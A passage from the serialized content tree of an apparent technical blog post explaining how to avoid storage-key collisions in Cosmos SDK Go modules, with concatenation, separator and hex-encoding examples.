PositionName",{"type":26,"tag":137,"props":87660,"children":87661},{"style":6009},[87662],{"type":32,"value":87646},{"type":26,"tag":137,"props":87664,"children":87665},{"class":5559,"line":5642},[87666,87670,87674,87678],{"type":26,"tag":137,"props":87667,"children":87668},{"style":5573},[87669],{"type":32,"value":35352},{"type":26,"tag":137,"props":87671,"children":87672},{"style":6009},[87673],{"type":32,"value":10009},{"type":26,"tag":137,"props":87675,"children":87676},{"style":5573},[87677],{"type":32,"value":23744},{"type":26,"tag":137,"props":87679,"children":87680},{"style":5601},[87681],{"type":32,"value":5875},{"type":26,"tag":137,"props":87683,"children":87684},{"class":5559,"line":5745},[87685,87689,87693],{"type":26,"tag":137,"props":87686,"children":87687},{"style":5584},[87688],{"type":32,"value":45830},{"type":26,"tag":137,"props":87690,"children":87691},{"style":5601},[87692],{"type":32,"value":78830},{"type":26,"tag":137,"props":87694,"children":87695},{"style":6009},[87696],{"type":32,"value":86830},{"type":26,"tag":137,"props":87698,"children":87699},{"class":5559,"line":5850},[87700],{"type":26,"tag":137,"props":87701,"children":87702},{"style":5601},[87703],{"type":32,"value":6507},{"type":26,"tag":137,"props":87705,"children":87706},{"class":5559,"line":5878},[87707,87711,87716],{"type":26,"tag":137,"props":87708,"children":87709},{"style":5573},[87710],{"type":32,"value":35352},{"type":26,"tag":137,"props":87712,"children":87713},{"style":6009},[87714],{"type":32,"value":87715}," PositionMap",{"type":26,"tag":137,"props":87717,"children":87718},{"style":5590},[87719],{"type":32,"value":87720}," :=\n",{"type":26,"tag":137,"props":87722,"children":87723},{"class":5559,"line":5891},[87724,87729,87733,87738,87742,87746,87750,87755,87759,87763,87767,87772,87776],{"type":26,"tag":137,"props":87725,"children":87726},{"style":5573},[87727],{"type":32,"value":87728},"    map",{"type":26,"tag":137,"props":87730,"children":87731},{"style":5601},[87732],{"type":32,"value":3016},{"type":26,"tag":137,"props":87734,"children":87735},{"style":6009},[87736],{"type":32,"value":87737},"VaultId",{"type":26,"tag":137,"props":87739,"children":87740},{"style":5601},[87741],{"type":32,"value":3079},{"type":26,"tag":137,"props":87743,"children":87744},{"style":5573},[87745],{"type":32,"value":69703},{"type":26,"tag":137,"props":87747,"children":87748},{"style":5601},[87749],{"type":32,"value":3016},{"type":26,"tag":137,"props":87751,"children":87752},{"style":6009},[87753],{"type":32,"value":87754},"Username",{"type":26,"tag":137,"props":87756,"children":87757},{"style":5601},[87758],{"type":32,"value":3079},{"type":26,"tag":137,"props":87760,"children":87761},{"style":5573},[87762],{"type":32,"value":69703},{"type":26,"tag":137,"props":87764,"children":87765},{"style":5601},[87766],{"type":32,"value":3016},{"type":26,"tag":137,"props":87768,"children":87769},{"style":6009},[87770],{"type":32,"value":87771},"PositionName",{"type":26,"tag":137,"props":87773,"children":87774},{"style":5601},[87775],{"type":32,"value":3079},{"type":26,"tag":137,"props":87777,"children":87778},{"style":6009},[87779],{"type":32,"value":87780},"Position\n",{"type":26,"tag":35,"props":87782,"children":87783},{},[87784,87786,87792],{"type":32,"value":87785},"Given that there are two levels of keys in ",{"type":26,"tag":130,"props":87787,"children":87789},{"className":87788},[],[87790],{"type":32,"value":87791},"PositionMap",{"type":32,"value":87793},", we should try to serialize these three map keys into a hierarchically searchable storage key. The most straightforward mitigation is to convert all fields into strings and concat them together.",{"type":26,"tag":5512,"props":87795,"children":87797},{"code":87796,"language":78767,"meta":7,"className":78768,"style":7},"storageKey := fmt.Sprintf(\n    \"%d%s%s\",\n    vaultId,\n    username,\n    positionName,\n)\n",[87798],{"type":26,"tag":130,"props":87799,"children":87800},{"__ignoreMap":7},[87801,87830,87842,87854,87866,87878],{"type":26,"tag":137,"props":87802,"children":87803},{"class":5559,"line":5560},[87804,87809,87813,87817,87821,87826],{"type":26,"tag":137,"props":87805,"children":87806},{"style":5584},[87807],{"type":32,"value":87808},"storageKey",{"type":26,"tag":137,"props":87810,"children":87811},{"style":5590},[87812],{"type":32,"value":79019},{"type":26,"tag":137,"props":87814,"children":87815},{"style":5584},[87816],{"type":32,"value":84836},{"type":26,"tag":137,"props":87818,"children":87819},{"style":5601},[87820],{"type":32,"value":470},{"type":26,"tag":137,"props":87822,"children":87823},{"style":5682},[87824],{"type":32,"value":87825},"Sprintf",{"type":26,"tag":137,"props":87827,"children":87828},{"style":5601},[87829],{"type":32,"value":6054},{"type":26,"tag":137,"props":87831,"children":87832},{"class":5559,"line":5412},[87833,87838],{"type":26,"tag":137,"props":87834,"children":87835},{"style":6837},[87836],{"type":32,"value":87837},"    \"%d%s%s\"",{"type":26,"tag":137,"props":87839,"children":87840},{"style":5601},[87841],{"type":32,"value":6099},{"type":26,"tag":137,"props":87843,"children":87844},{"class":5559,"line":5417},[87845,87850],{"type":26,"tag":137,"props":87846,"children":87847},{"style":5584},[87848],{"type":32,"value":87849},"    vaultId",{"type":26,"tag":137,"props":87851,"children":87852},{"style":5601},[87853],{"type":32,"value":6099},{"type":26,"tag":137,"props":87855,"children":87856},{"class":5559,"line":5642},[87857,87862],{"type":26,"tag":137,"props":87858,"children":87859},{"style":5584},[87860],{"type":32,"value":87861},"    username",{"type":26,"tag":137,"props":87863,"children":87864},{"style":5601},[87865],{"type":32,"value":6099},{"type":26,"tag":137,"props":87867,"children":87868},{"class":5559,"line":5745},[87869,87874],{"type":26,"tag":137,"props":87870,"children":87871},{"style":5584},[87872],{"type":32,"value":87873},"    positionName",{"type":26,"tag":137,"props":87875,"children":87876},{"style":5601},[87877],{"type":32,"value":6099},{"type":26,"tag":137,"props":87879,"children":87880},{"class":5559,"line":5850},[87881],{"type":26,"tag":137,"props":87882,"children":87883},{"style":5601},[87884],{"type":32,"value":5742},{"type":26,"tag":35,"props":87886,"children":87887},{},[87888],{"type":32,"value":87889},"Although plain concatenation allows us to easily construct a storage key, it becomes apparent that this implementation is prone to key collisions.",{"type":26,"tag":5512,"props":87891,"children":87893},{"code":87892},"vaultId = 1,  username = \"2a\", positionName = \"b\"\n    => storageKey = \"12ab\"\n\nvaultId = 12, username = \"a\",  positionName = \"b\"\n    => storageKey = \"12ab\"\n",[87894],{"type":26,"tag":130,"props":87895,"children":87896},{"__ignoreMap":7},[87897],{"type":32,"value":87892},{"type":26,"tag":35,"props":87899,"children":87900},{},[87901,87906],{"type":26,"tag":762,"props":87902,"children":87903},{},[87904],{"type":32,"value":87905},"So, how can we mitigate this issue?",{"type":32,"value":87907},"\nPerhaps we can add a field separator between each field, which would resemble the following:",{"type":26,"tag":5512,"props":87909,"children":87911},{"code":87910,"language":78767,"meta":7,"className":78768,"style":7},"const (\n    Seperator = \"|\"\n)\n\nstorageKey := fmt.Sprintf(\n    \"%d%s%s%s%s\",\n    vaultId,\n    Seperator,\n    username,\n    Seperator,\n    positionName,\n)\n",[87912],{"type":26,"tag":130,"props":87913,"children":87914},{"__ignoreMap":7},[87915,87926,87943,87950,87957,87984,87996,88007,88018,88029,88040,88051],{"type":26,"tag":137,"props":87916,"children":87917},{"class":5559,"line":5560},[87918,87922],{"type":26,"tag":137,"props":87919,"children":87920},{"style":5573},[87921],{"type":32,"value":12244},{"type":26,"tag":137,"props":87923,"children":87924},{"style":5601},[87925],{"type":32,"value":81168},{"type":26,"tag":137,"props":87927,"children":87928},{"class":5559,"line":5412},[87929,87934,87938],{"type":26,"tag":137,"props":87930,"children":87931},{"style":5584},[87932],{"type":32,"value":87933},"    Seperator",{"type":26,"tag":137,"props":87935,"children":87936},{"style":5590},[87937],{"type":32,"value":5593},{"type":26,"tag":137,"props":87939,"children":87940},{"style":6837},[87941],{"type":32,"value":87942}," \"|\"\n",{"type":26,"tag":137,"props":87944,"children":87945},{"class":5559,"line":5417},[87946],{"type":26,"tag":137,"props":87947,"children":87948},{"style":5601},[87949],{"type":32,"value":5742},{"type":26,"tag":137,"props":87951,"children":87952},{"class":5559,"line":5642},[87953],{"type":26,"tag":137,"props":87954,"children":87955},{"emptyLinePlaceholder":18},[87956],{"type":32,"value":6276},{"type":26,"tag":137,"props":87958,"children":87959},{"class":5559,"line":5745},[87960,87964,87968,87972,87976,87980],{"type":26,"tag":137,"props":87961,"children":87962},{"style":5584},[87963],{"type":32,"value":87808},{"type":26,"tag":137,"props":87965,"children":87966},{"style":5590},[87967],{"type":32,"value":79019},{"type":26,"tag":137,"props":87969,"children":87970},{"style":5584},[87971],{"type":32,"value":84836},{"type":26,"tag":137,"props":87973,"children":87974},{"style":5601},[87975],{"type":32,"value":470},{"type":26,"tag":137,"props":87977,"children":87978},{"style":5682},[87979],{"type":32,"value":87825},{"type":26,"tag":137,"props":87981,"children":87982},{"style":5601},[87983],{"type":32,"value":6054},{"type":26,"tag":137,"props":87985,"children":87986},{"class":5559,"line":5850},[87987,87992],{"type":26,"tag":137,"props":87988,"children":87989},{"style":6837},[87990],{"type":32,"value":87991},"    \"%d%s%s%s%s\"",{"type":26,"tag":137,"props":87993,"children":87994},{"style":5601},[87995],{"type":32,"value":6099},{"type":26,"tag":137,"props":87997,"children":87998},{"class":5559,"line":5878},[87999,88003],{"type":26,"tag":137,"props":88000,"children":88001},{"style":5584},[88002],{"type":32,"value":87849},{"type":26,"tag":137,"props":88004,"children":88005},{"style":5601},[88006],{"type":32,"value":6099},{"type":26,"tag":137,"props":88008,"children":88009},{"class":5559,"line":5891},[88010,88014],{"type":26,"tag":137,"props":88011,"children":88012},{"style":5584},[88013],{"type":32,"value":87933},{"type":26,"tag":137,"props":88015,"children":88016},{"style":5601},[88017],{"type":32,"value":6099},{"type":26,"tag":137,"props":88019,"children":88020},{"class":5559,"line":5909},[88021,88025],{"type":26,"tag":137,"props":88022,"children":88023},{"style":5584},[88024],{"type":32,"value":87861},{"type":26,"tag":137,"props":88026,"children":88027},{"style":5601},[88028],{"type":32,"value":6099},{"type":26,"tag":137,"props":88030,"children":88031},{"class":5559,"line":5930},[88032,88036],{"type":26,"tag":137,"props":88033,"children":88034},{"style":5584},[88035],{"type":32,"value":87933},{"type":26,"tag":137,"props":88037,"children":88038},{"style":5601},[88039],{"type":32,"value":6099},{"type":26,"tag":137,"props":88041,"children":88042},{"class":5559,"line":5939},[88043,88047],{"type":26,"tag":137,"props":88044,"children":88045},{"style":5584},[88046],{"type":32,"value":87873},{"type":26,"tag":137,"props":88048,"children":88049},{"style":5601},[88050],{"type":32,"value":6099},{"type":26,"tag":137,"props":88052,"children":88053},{"class":5559,"line":6191},[88054],{"type":26,"tag":137,"props":88055,"children":88056},{"style":5601},[88057],{"type":32,"value":5742},{"type":26,"tag":35,"props":88059,"children":88060},{},[88061],{"type":32,"value":88062},"Inserting a separator helps prevent most accidental collisions, but does it completely solve the problem?",{"type":26,"tag":35,"props":88064,"children":88065},{},[88066,88068,88074,88075,88081],{"type":32,"value":88067},"Sadly, it doesn't. Since the ",{"type":26,"tag":130,"props":88069,"children":88071},{"className":88070},[],[88072],{"type":32,"value":88073},"username",{"type":32,"value":3339},{"type":26,"tag":130,"props":88076,"children":88078},{"className":88077},[],[88079],{"type":32,"value":88080},"vaultName",{"type":32,"value":88082}," are both strings that may contain arbitrary characters (including the separator), collisions can still happen.",{"type":26,"tag":5512,"props":88084,"children":88086},{"code":88085},"vaultId = 1, username = \"a|\", positionName = \"b\"\n    => storageKey = \"1|a||b\"\n\nvaultId = 1, username = \"a\",  positionName = \"|b\"\n    => storageKey = \"1|a||b\"\n",[88087],{"type":26,"tag":130,"props":88088,"children":88089},{"__ignoreMap":7},[88090],{"type":32,"value":88085},{"type":26,"tag":35,"props":88092,"children":88093},{},[88094],{"type":32,"value":88095},"To further mitigate this, we could encode all fields to ensure that the separator is excluded in individual fields, thus making field injections impossible.",{"type":26,"tag":5512,"props":88097,"children":88099},{"code":88098,"language":78767,"meta":7,"className":78768,"style":7},"const (\n    Seperator = \"|\"\n)\n\n\nusernameEncoded := make(\n    []byte,\n    hex.EncodedLen(len(username)),\n)\nhex.Encode(usernameEncoded, username)\n\npositionNameEncoded := make(\n    []byte,\n    hex.EncodedLen(len(positionName)),\n)\nhex.Encode(positionNameEncoded, positionName)\n\nstorageKey := fmt.Sprintf(\n    \"%d%s%s%s%s\",\n    vaultId,\n    Seperator,\n    usernameEncoded,\n    Seperator,\n    positionNameEncoded\n)\n",[88100],{"type":26,"tag":130,"props":88101,"children":88102},{"__ignoreMap":7},[88103,88114,88129,88136,88143,88150,88171,88187,88225,88232,88269,88276,88296,88311,88347,88354,88389,88396,88423,88434,88445,88456,88468,88479,88487],{"type":26,"tag":137,"props":88104,"children":88105},{"class":5559,"line":5560},[88106,88110],{"type":26,"tag":137,"props":88107,"children":88108},{"style":5573},[88109],{"type":32,"value":12244},{"type":26,"tag":137,"props":88111,"children":88112},{"style":5601},[88113],{"type":32,"value":81168},{"type":26,"tag":137,"props":88115,"children":88116},{"class":5559,"line":5412},[88117,88121,88125],{"type":26,"tag":137,"props":88118,"children":88119},{"style":5584},[88120],{"type":32,"value":87933},{"type":26,"tag":137,"props":88122,"children":88123},{"style":5590},[88124],{"type":32,"value":5593},{"type":26,"tag":137,"props":88126,"children":88127},{"style":6837},[88128],{"type":32,"value":87942},{"type":26,"tag":137,"props":88130,"children":88131},{"class":5559,"line":5417},[88132],{"type":26,"tag":137,"props":88133,"children":88134},{"style":5601},[88135],{"type":32,"value":5742},{"type":26,"tag":137,"props":88137,"children":88138},{"class":5559,"line":5642},[88139],{"type":26,"tag":137,"props":88140,"children":88141},{"emptyLinePlaceholder":18},[88142],{"type":32,"value":6276},{"type":26,"tag":137,"props":88144,"children":88145},{"class":5559,"line":5745},[88146],{"type":26,"tag":137,"props":88147,"children":88148},{"emptyLinePlaceholder":18},[88149],{"type":32,"value":6276},{"type":26,"tag":137,"props":88151,"children":88152},{"class":5559,"line":5850},[88153,88158,88162,88167],{"type":26,"tag":137,"props":88154,"children":88155},{"style":5584},[88156],{"type":32,"value":88157},"usernameEncoded",{"type":26,"tag":137,"props":88159,"children":88160},{"style":5590},[88161],{"type":32,"value":79019},{"type":26,"tag":137,"props":88163,"children":88164},{"style":5682},[88165],{"type":32,"value":88166}," make",{"type":26,"tag":137,"props":88168,"children":88169},{"style":5601},[88170],{"type":32,"value":6054},{"type":26,"tag":137,"props":88172,"children":88173},{"class":5559,"line":5878},[88174,88179,88183],{"type":26,"tag":137,"props":88175,"children":88176},{"style":5601},[88177],{"type":32,"value":88178},"    []",{"type":26,"tag":137,"props":88180,"children":88181},{"style":6009},[88182],{"type":32,"value":87367},{"type":26,"tag":137,"props":88184,"children":88185},{"style":5601},[88186],{"type":32,"value":6099},{"type":26,"tag":137,"props":88188,"children":88189},{"class":5559,"line":5891},[88190,88195,88199,88204,88208,88212,88216,88220],{"type":26,"tag":137,"props":88191,"children":88192},{"style":5584},[88193],{"type":32,"value":88194},"    hex",{"type":26,"tag":137,"props":88196,"children":88197},{"style":5601},[88198],{"type":32,"value":470},{"type":26,"tag":137,"props":88200,"children":88201},{"style":5682},[88202],{"type":32,"value":88203},"EncodedLen",{"type":26,"tag":137,"props":88205,"children":88206},{"style":5601},[88207],{"type":32,"value":165},{"type":26,"tag":137,"props":88209,"children":88210},{"style":5682},[88211],{"type":32,"value":11727},{"type":26,"tag":137,"props":88213,"children":88214},{"style":5601},[88215],{"type":32,"value":165},{"type":26,"tag":137,"props":88217,"children":88218},{"style":5584},[88219],{"type":32,"value":88073},{"type":26,"tag":137,"props":88221,"children":88222},{"style":5601},[88223],{"type":32,"value":88224},")),\n",{"type":26,"tag":137,"props":88226,"children":88227},{"class":5559,"line":5909},[88228],{"type":26,"tag":137,"props":88229,"children":88230},{"style":5601},[88231],{"type":32,"value":5742},{"type":26,"tag":137,"props":88233,"children":88234},{"class":5559,"line":5930},[88235,88240,88244,88249,88253,88257,88261,88265],{"type":26,"tag":137,"props":88236,"children":88237},{"style":5584},[88238],{"type":32,"value":88239},"hex",{"type":26,"tag":137,"props":88241,"children":88242},{"style":5601},[88243],{"type":32,"value":470},{"type":26,"tag":137,"props":88245,"children":88246},{"style":5682},[88247],{"type":32,"value":88248},"Encode",{"type":26,"tag":137,"props":88250,"children":88251},{"style":5601},[88252],{"type":32,"value":165},{"type":26,"tag":137,"props":88254,"children":88255},{"style":5584},[88256],{"type":32,"value":88157},{"type":26,"tag":137,"props":88258,"children":88259},{"style":5601},[88260],{"type":32,"value":1108},{"type":26,"tag":137,"props":88262,"children":88263},{"style":5584},[88264],{"type":32,"value":88073},{"type":26,"tag":137,"props":88266,"children":88267},{"style":5601},[88268],{"type":32,"value":5742},{"type":26,"tag":137,"props":88270,"children":88271},{"class":5559,"line":5939},[88272],{"type":26,"tag":137,"props":88273,"children":88274},{"emptyLinePlaceholder":18},[88275],{"type":32,"value":6276},{"type":26,"tag":137,"props":88277,"children":88278},{"class":5559,"line":6191},[88279,88284,88288,88292],{"type":26,"tag":137,"props":88280,"children":88281},{"style":5584},[88282],{"type":32,"value":88283},"positionNameEncoded",{"type":26,"tag":137,"props":88285,"children":88286},{"style":5590},[88287],{"type":32,"value":79019},{"type":26,"tag":137,"props":88289,"children":88290},{"style":5682},[88291],{"type":32,"value":88166},{"type":26,"tag":137,"props":88293,"children":88294},{"style":5601},[88295],{"type":32,"value":6054},{"type":26,"tag":137,"props":88297,"children":88298},{"class":5559,"line":6208},[88299,88303,88307],{"type":26,"tag":137,"props":88300,"children":88301},{"style":5601},[88302],{"type":32,"value":88178},{"type":26,"tag":137,"props":88304,"children":88305},{"style":6009},[88306],{"type":32,"value":87367},{"type":26,"tag":137,"props":88308,"children":88309},{"style":5601},[88310],{"type":32,"value":6099},{"type":26,"tag":137,"props":88312,"children":88313},{"class":5559,"line":6225},[88314,88318,88322,88326,88330,88334,88338,88343],{"type":26,"tag":137,"props":88315,"children":88316},{"style":5584},[88317],{"type":32,"value":88194},{"type":26,"tag":137,"props":88319,"children":88320},{"style":5601},[88321],{"type":32,"value":470},{"type":26,"tag":137,"props":88323,"children":88324},{"style":5682},[88325],{"type":32,"value":88203},{"type":26,"tag":137,"props":88327,"children":88328},{"style":5601},[88329],{"type":32,"value":165},{"type":26,"tag":137,"props":88331,"children":88332},{"style":5682},[88333],{"type":32,"value":11727},{"type":26,"tag":137,"props":88335,"children":88336},{"style":5601},[88337],{"type":32,"value":165},{"type":26,"tag":137,"props":88339,"children":88340},{"style":5584},[88341],{"type":32,"value":88342},"positionName",{"type":26,"tag":137,"props":88344,"children":88345},{"style":5601},[88346],{"type":32,"value":88224},{"type":26,"tag":137,"props":88348,"children":88349},{"class":5559,"line":6238},[88350],{"type":26,"tag":137,"props":88351,"children":88352},{"style":5601},[88353],{"type":32,"value":5742},{"type":26,"tag":137,"props":88355,"children":88356},{"class":5559,"line":6247},[88357,88361,88365,88369,88373,88377,88381,88385],{"type":26,"tag":137,"props":88358,"children":88359},{"style":5584},[88360],{"type":32,"value":88239},{"type":26,"tag":137,"props":88362,"children":88363},{"style":5601},[88364],{"type":32,"value":470},{"type":26,"tag":137,"props":88366,"children":88367},{"style":5682},[88368],{"type":32,"value":88248},{"type":26,"tag":137,"props":88370,"children":88371},{"style":5601},[88372],{"type":32,"value":165},{"type":26,"tag":137,"props":88374,"children":88375},{"style":5584},[88376],{"type":32,"value":88283},{"type":26,"tag":137,"props":88378,"children":88379},{"style":5601},[88380],{"type":32,"value":1108},{"type":26,"tag":137,"props":88382,"children":88383},{"style":5584},[88384],{"type":32,"value":88342},{"type":26,"tag":137,"props":88386,"children":88387},{"style":5601},[88388],{"type":32,"value":5742},{"type":26,"tag":137,"props":88390,"children":88391},{"class":5559,"line":6270},[88392],{"type":26,"tag":137,"props":88393,"children":88394},{"emptyLinePlaceholder":18},[88395],{"type":32,"value":6276},{"type":26,"tag":137,"props":88397,"children":88398},{"class":5559,"line":6279},[88399,88403,88407,88411,88415,88419],{"type":26,"tag":137,"props":88400,"children":88401},{"style":5584},[88402],{"type":32,"value":87808},{"type":26,"tag":137,"props":88404,"children":88405},{"style":5590},[88406],{"type":32,"value":79019},{"type":26,"tag":137,"props":88408,"children":88409},{"style":5584},[88410],{"type":32,"value":84836},{"type":26,"tag":137,"props":88412,"children":88413},{"style":5601},[88414],{"type":32,"value":470},{"type":26,"tag":137,"props":88416,"children":88417},{"style":5682},[88418],{"type":32,"value":87825},{"type":26,"tag":137,"props":88420,"children":88421},{"style":5601},[88422],{"type":32,"value":6054},{"type":26,"tag":137,"props":88424,"children":88425},{"class":5559,"line":6288},[88426,88430],{"type":26,"tag":137,"props":88427,"children":88428},{"style":6837},[88429],{"type":32,"value":87991},{"type":26,"tag":137,"props":88431,"children":88432},{"style":5601},[88433],{"type":32,"value":6099},{"type":26,"tag":137,"props":88435,"children":88436},{"class":5559,"line":6355},[88437,88441],{"type":26,"tag":137,"props":88438,"children":88439},{"style":5584},[88440],{"type":32,"value":87849},{"type":26,"tag":137,"props":88442,"children":88443},{"style":5601},[88444],{"type":32,"value":6099},{"type":26,"tag":137,"props":88446,"children":88447},{"class":5559,"line":6363},[88448,88452],{"type":26,"tag":137,"props":88449,"children":88450},{"style":5584},[88451],{"type":32,"value":87933},{"type":26,"tag":137,"props":88453,"children":88454},{"style":5601},[88455],{"type":32,"value":6099},{"type":26,"tag":137,"props":88457,"children":88458},{"class":5559,"line":6393},[88459,88464],{"type":26,"tag":137,"props":88460,"children":88461},{"style":5584},[88462],{"type":32,"value":88463},"    usernameEncoded",{"type":26,"tag":137,"props":88465,"children":88466},{"style":5601},[88467],{"type":32,"value":6099},{"type":26,"tag":137,"props":88469,"children":88470},{"class":5559,"line":6401},[88471,88475],{"type":26,"tag":137,"props":88472,"children":88473},{"style":5584},[88474],{"type":32,"value":87933},{"type":26,"tag":137,"props":88476,"children":88477},{"style":5601},[88478],{"type":32,"value":6099},{"type":26,"tag":137,"props":88480,"children":88481},{"class":5559,"line":6433},[88482],{"type":26,"tag":137,"props":88483,"children":88484},{"style":5584},[88485],{"type":32,"value":88486},"    positionNameEncoded\n",{"type":26,"tag":137,"props":88488,"children":88489},{"class":5559,"line":6441},[88490],{"type":26,"tag":137,"props":88491,"children":88492},{"style":5601},[88493],{"type":32,"value":5742},{"type":26,"tag":35,"props":88495,"children":88496},{},[88497,88499,88504],{"type":32,"value":88498},"We did it. We finally eliminated all potential ",{"type":26,"tag":130,"props":88500,"children":88502},{"className":88501},[],[88503],{"type":32,"value":87808},{"type":32,"value":88505}," collisions.",{"type":26,"tag":35,"props":88507,"children":88508},{},[88509],{"type":32,"value":88510},"Until now, our focus has primarily been on storing a single structure. We recognize that in real-world applications, we frequently encounter scenarios where multiple structures must be stored as persistent states.",{"type":26,"tag":35,"props":88512,"children":88513},{},[88514,88516,88522,88524,88529,88531,88536,88538,88543,88545,88551],{"type":32,"value":88515},"In the Cosmos framework, it is common for each ",{"type":26,"tag":130,"props":88517,"children":88519},{"className":88518},[],[88520],{"type":32,"value":88521},"Module",{"type":32,"value":88523}," to own a few ",{"type":26,"tag":130,"props":88525,"children":88527},{"className":88526},[],[88528],{"type":32,"value":87579},{"type":32,"value":88530}," and have individual ",{"type":26,"tag":130,"props":88532,"children":88534},{"className":88533},[],[88535],{"type":32,"value":82547},{"type":32,"value":88537},"s managing access to storages. It's also important to note that each ",{"type":26,"tag":130,"props":88539,"children":88541},{"className":88540},[],[88542],{"type":32,"value":87579},{"type":32,"value":88544}," should be independent from one another, alleviating developers from having to worry about key collisions between different ",{"type":26,"tag":130,"props":88546,"children":88548},{"className":88547},[],[88549],{"type":32,"value":88550},"Modules",{"type":32,"value":470},{"type":26,"tag":35,"props":88553,"children":88554},{},[88555,88557,88562],{"type":32,"value":88556},"With that being said, what if we have to maintain more than one structure within the same ",{"type":26,"tag":130,"props":88558,"children":88560},{"className":88559},[],[88561],{"type":32,"value":87579},{"type":32,"value":5737},{"type":26,"tag":35,"props":88564,"children":88565},{},[88566,88568,88574,88576,88581],{"type":32,"value":88567},"To demonstrate this scenario, we introduce the ",{"type":26,"tag":130,"props":88569,"children":88571},{"className":88570},[],[88572],{"type":32,"value":88573},"NameToAddressMap",{"type":32,"value":88575}," structure, which will be stored in the same ",{"type":26,"tag":130,"props":88577,"children":88579},{"className":88578},[],[88580],{"type":32,"value":87579},{"type":32,"value":88582}," we previously used.",{"type":26,"tag":5512,"props":88584,"children":88586},{"code":88585,"language":78767,"meta":7,"className":78768,"style":7},"type VaultId uint64\ntype Username string\n\ntype PositionName string\ntype Position struct {\n    data []byte\n}\ntype PositionMap :=\n    map[VaultId]map[Username]map[PositionName]Position\n\ntype AddressName string\ntype Address struct {\n data []byte\n}\ntype AddressMap :=\n    map[VaultId]map[Username]map[AddressName]Address\n",[88587],{"type":26,"tag":130,"props":88588,"children":88589},{"__ignoreMap":7},[88590,88605,88620,88627,88642,88661,88676,88683,88698,88753,88760,88776,88796,88811,88818,88834],{"type":26,"tag":137,"props":88591,"children":88592},{"class":5559,"line":5560},[88593,88597,88601],{"type":26,"tag":137,"props":88594,"children":88595},{"style":5573},[88596],{"type":32,"value":35352},{"type":26,"tag":137,"props":88598,"children":88599},{"style":6009},[88600],{"type":32,"value":87625},{"type":26,"tag":137,"props":88602,"children":88603},{"style":6009},[88604],{"type":32,"value":78805},{"type":26,"tag":137,"props":88606,"children":88607},{"class":5559,"line":5412},[88608,88612,88616],{"type":26,"tag":137,"props":88609,"children":88610},{"style":5573},[88611],{"type":32,"value":35352},{"type":26,"tag":137,"props":88613,"children":88614},{"style":6009},[88615],{"type":32,"value":87641},{"type":26,"tag":137,"props":88617,"children":88618},{"style":6009},[88619],{"type":32,"value":87646},{"type":26,"tag":137,"props":88621,"children":88622},{"class":5559,"line":5417},[88623],{"type":26,"tag":137,"props":88624,"children":88625},{"emptyLinePlaceholder":18},[88626],{"type":32,"value":6276},{"type":26,"tag":137,"props":88628,"children":88629},{"class":5559,"line":5642},[88630,88634,88638],{"type":26,"tag":137,"props":88631,"children":88632},{"style":5573},[88633],{"type":32,"value":35352},{"type":26,"tag":137,"props":88635,"children":88636},{"style":6009},[88637],{"type":32,"value":87658},{"type":26,"tag":137,"props":88639,"children":88640},{"style":6009},[88641],{"type":32,"value":87646},{"type":26,"tag":137,"props":88643,"children":88644},{"class":5559,"line":5745},[88645,88649,88653,88657],{"type":26,"tag":137,"props":88646,"children":88647},{"style":5573},[88648],{"type":32,"value":35352},{"type":26,"tag":137,"props":88650,"children":88651},{"style":6009},[88652],{"type":32,"value":10009},{"type":26,"tag":137,"props":88654,"children":88655},{"style":5573},[88656],{"type":32,"value":23744},{"type":26,"tag":137,"props":88658,"children":88659},{"style":5601},[88660],{"type":32,"value":5875},{"type":26,"tag":137,"props":88662,"children":88663},{"class":5559,"line":5850},[88664,88668,88672],{"type":26,"tag":137,"props":88665,"children":88666},{"style":5584},[88667],{"type":32,"value":45830},{"type":26,"tag":137,"props":88669,"children":88670},{"style":5601},[88671],{"type":32,"value":78830},{"type":26,"tag":137,"props":88673,"children":88674},{"style":6009},[88675],{"type":32,"value":86830},{"type":26,"tag":137,"props":88677,"children":88678},{"class":5559,"line":5878},[88679],{"type":26,"tag":137,"props":88680,"children":88681},{"style":5601},[88682],{"type":32,"value":6507},{"type":26,"tag":137,"props":88684,"children":88685},{"class":5559,"line":5891},[88686,88690,88694],{"type":26,"tag":137,"props":88687,"children":88688},{"style":5573},[88689],{"type":32,"value":35352},{"type":26,"tag":137,"props":88691,"children":88692},{"style":6009},[88693],{"type":32,"value":87715},{"type":26,"tag":137,"props":88695,"children":88696},{"style":5590},[88697],{"type":32,"value":87720},{"type":26,"tag":137,"props":88699,"children":88700},{"class":5559,"line":5909},[88701,88705,88709,88713,88717,88721,88725,88729,88733,88737,88741,88745,88749],{"type":26,"tag":137,"props":88702,"children":88703},{"style":5573},[88704],{"type":32,"value":87728},{"type":26,"tag":137,"props":88706,"children":88707},{"style":5601},[88708],{"type":32,"value":3016},{"type":26,"tag":137,"props":88710,"children":88711},{"style":6009},[88712],{"type":32,"value":87737},{"type":26,"tag":137,"props":88714,"children":88715},{"style":5601},[88716],{"type":32,"value":3079},{"type":26,"tag":137,"props":88718,"children":88719},{"style":5573},[88720],{"type":32,"value":69703},{"type":26,"tag":137,"props":88722,"children":88723},{"style":5601},[88724],{"type":32,"value":3016},{"type":26,"tag":137,"props":88726,"children":88727},{"style":6009},[88728],{"type":32,"value":87754},{"type":26,"tag":137,"props":88730,"children":88731},{"style":5601},[88732],{"type":32,"value":3079},{"type":26,"tag":137,"props":88734,"children":88735},{"style":5573},[88736],{"type":32,"value":69703},{"type":26,"tag":137,"props":88738,"children":88739},{"style":5601},[88740],{"type":32,"value":3016},{"type":26,"tag":137,"props":88742,"children":88743},{"style":6009},[88744],{"type":32,"value":87771},{"type":26,"tag":137,"props":88746,"children":88747},{"style":5601},[88748],{"type":32,"value":3079},{"type":26,"tag":137,"props":88750,"children":88751},{"style":6009},[88752],{"type":32,"value":87780},{"type":26,"tag":137,"props":88754,"children":88755},{"class":5559,"line":5930},[88756],{"type":26,"tag":137,"props":88757,"children":88758},{"emptyLinePlaceholder":18},[88759],{"type":32,"value":6276},{"type":26,"tag":137,"props":88761,"children":88762},{"class":5559,"line":5939},[88763,88767,88772],{"type":26,"tag":137,"props":88764,"children":88765},{"style":5573},[88766],{"type":32,"value":35352},{"type":26,"tag":137,"props":88768,"children":88769},{"style":6009},[88770],{"type":32,"value":88771}," AddressName",{"type":26,"tag":137,"props":88773,"children":88774},{"style":6009},[88775],{"type":32,"value":87646},{"type":26,"tag":137,"props":88777,"children":88778},{"class":5559,"line":6191},[88779,88783,88788,88792],{"type":26,"tag":137,"props":88780,"children":88781},{"style":5573},[88782],{"type":32,"value":35352},{"type":26,"tag":137,"props":88784,"children":88785},{"style":6009},[88786],{"type":32,"value":88787}," 